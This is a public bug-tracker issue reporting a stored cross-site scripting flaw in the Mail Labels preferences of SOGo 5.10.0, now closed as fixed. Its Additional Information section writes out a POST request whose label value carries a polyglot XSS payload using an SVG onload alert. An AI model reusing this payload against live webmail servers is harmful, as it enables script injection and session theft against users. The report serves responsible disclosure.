View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0006007 | SOGo | Web Preferences | public | 2024-08-19 23:59 | 2024-09-12 06:58 |
Reporter | julian123 | Assigned To | qhivert | ||
Priority | normal | Severity | minor | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Platform | [Server] Linux | OS | Ubuntu | OS Version | 16.04 LTS |
Product Version | 5.10.0 | ||||
Summary | 0006007: Stored-XSS in Mail Labels Field | ||||
Description | A cross-site scripting payload can be stored in the Mail Labels fields, leading to execution when the user navigates to their inbox. | ||||
Steps To Reproduce |
| ||||
Additional Information | POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1 ],"$label3":["Personal","#009900"],"$forwarded":["Forwarded","#B01FE3"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e","#aaa"]}, GET /SOGo/so/john@123.com/Preferences HTTP/1.1 HTTP/1.1 200 OK ...snip... | ||||
Tags | mail settings | ||||
Date Modified | Username | Field | Change |
---|---|---|---|
2024-08-19 23:59 | julian123 | New Issue | |
2024-08-19 23:59 | julian123 | Tag Attached: mail settings | |
2024-08-20 14:08 | qhivert | Relationship added | related to 0006010 |
2024-08-20 14:08 | qhivert | Relationship added | related to 0006004 |
2024-09-12 06:58 | qhivert | Assigned To | => qhivert |
2024-09-12 06:58 | qhivert | Status | new => closed |
2024-09-12 06:58 | qhivert | Resolution | open => fixed |